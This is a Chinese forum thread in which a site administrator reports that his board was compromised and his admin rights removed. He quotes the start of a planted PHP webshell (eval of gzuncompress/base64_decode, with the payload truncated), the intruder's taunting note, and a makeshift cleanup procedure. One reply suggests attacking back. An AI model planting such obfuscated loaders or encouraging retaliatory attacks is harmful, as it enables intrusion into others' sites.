新奇BUG事件，请关注，关于论坛被攻，事件，特以申明。。。。

今中午重在修改文件时发现一个重大的问韪，我的官理员不是管理员了！变了！后我在做了修改还发现所有权限已被修改我看过之后，空间里多了这几种文件，
1A.asp        lindex.php      等其它几个自动新增文件，，特别注意下；期它文件已被我删除！！！


lindex.php里面有这一段：

1. <?php
   
2. 
   
3. $admin['pass'] = "wangjingnan"; //设置密码
   
4. 
   
5. $notice = "<FONT color=#ff3300>目录：</font>"; //设置版权
   
6. 
   
7. $myneme = "缘份PHP木马"; //设置标题
   
8. 
   
9. eval(gzuncompress(base64_decode.................................190J0=")))?>

复制代码

还给我自动留言如下：

1. 2009-8-29 18:02      梦云兔
   
2. 毛线，你真难联系哦，QQ加不上，论坛发个消息还要威望，真搞笑，
   
3. 本来想告诉你 你论坛有漏洞滴，可是你的QQ加了2小时都没加上，论坛还不给发消息，
   
4. 我只能撤你管理权限让你知道你的论坛有问题，
   
5. 
   
6. 现在我又撤掉你了，哈哈，打扰了，有疑问联系我:418754218

复制代码

1. 经我检查文件发现这个家伙把文件加上了几个！垃圾网站的自动连接地址：
   
2. 其中一个我一看就知道是那个家伙的网址 ：http://www.mengyuntu.com

复制代码

请官方人员急时处理，有可能还会在来·这是个BUG，想想大家都有可能遇到吧！！


请作出BUG漏洞的策略。。。。谢谢！。。。。


为什么要攻击我家网址：http://bbs.xywl518.cn   


原文来自紫仙网游社区：http://bbs.xywl518.cn/thread-708-1-1.html

已找到解决方法，不过还是要请官方人员做出补丁出来！

解决方法如下：
找到以上说的新增文件，看清楚了之后确认无误，删除。。。。


找到相应的BBS目录：config.inc.php     修改创始人UID：1

检查无误，这方法可能只是一时，我也不太大肯定做完工作。。。。


还2次  连续攻击  间隔  几个小时。那人真是。。。。。。。。。

他攻击你 你也攻击他 互相攻击吧

呵呵，多谢支持，说是有漏洞，能打出来么？？？

我的也发现了这个漏洞，正在修改

就是官方这个没有人来管啊！！我晕
！！！！！！！

哦....牛逼呀













signature-----------------------------------------------
    九鼎记